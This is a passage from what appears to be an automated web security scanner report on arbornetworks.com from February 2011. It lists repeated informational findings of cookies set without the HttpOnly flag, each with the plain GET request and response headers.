User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d21572adb250c8086746f946f177554e; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:52:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.325. http://www.arbornetworks.com/en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e57b9fb474b87112255a4d9be9bcd9fd; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:52:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.326. http://www.arbornetworks.com/en/asert-arbor-security-engineering-response-team-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/asert-arbor-security-engineering-response-team-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f801899e89a9fde8b12411b0892a1130; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:41 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:41 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:42 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.327. http://www.arbornetworks.com/en/atlas-global-network-threat-analysis-460.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/atlas-global-network-threat-analysis-460.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=483b845480caf13825757682b0239785; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:34 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:34 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:35 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:36 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.328. http://www.arbornetworks.com/en/channel-partners-3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/channel-partners-3.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/channel-partners-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:51:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=aeeb2927168d71237180dbad9ee63128; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:44 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:44 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:45 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:51:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.329. http://www.arbornetworks.com/en/com-5fcontent/view-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/com-5fcontent/view-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/com-5fcontent/view-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=729dfe8e5c19a0af96d43ff8435a4b49; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:09 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:09 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:10 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.330. http://www.arbornetworks.com/en/com-5fcontent/view-3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/com-5fcontent/view-3.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/com-5fcontent/view-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ecb7056e32288d9cc170631c375c0b34; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:25 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:25 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:26 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.331. http://www.arbornetworks.com/en/contact-us-4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us-4.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/contact-us-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:28 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=08c54c3b2084f52f0621dbf90082a97f; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:28 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:28 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:29 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:30 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.332. http://www.arbornetworks.com/en/contact-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/contact-us.html HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; e585cbcac8f7bba066a55f149566ddd5=-; __utmz=186398841.1296696461.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; e411486dda3a9a212ec0bba8fd7ed343=5e36548abe003c359e3e6d61a215e937; mbfcookie[lang]=en; __utma=186398841.1861161794.1296689848.1296689848.1296696461.2; __utmc=186398841; __utmb=186398841.2.10.1296696461

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 01:39:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=3022831cda34d0d6c74361c68342c68e; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:39:21 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:39:21 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:39:22 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:39:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.333. http://www.arbornetworks.com/en/customer-solution-briefs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/customer-solution-briefs.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/customer-solution-briefs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f7b66a3d1f954eb42a17e42668161295; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.334. http://www.arbornetworks.com/en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=223125452deb4fa188862b1e7e1d100c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:48 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:48 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:49 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:49 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.335. http://www.arbornetworks.com/en/ipv6-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/ipv6-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/ipv6-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=4235f47faf294d487cfd850f85d27581; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:06 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:06 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:07 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:52:09 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.336. http://www.arbornetworks.com/en/meet-our-partners.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/meet-our-partners.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/meet-our-partners.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:51:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=56baf30018cc500646e86a5ce1392060; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:02 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:02 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:03 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:51:03 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...

11.337. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-monitoring-security-news-events.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/network-monitoring-security-news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
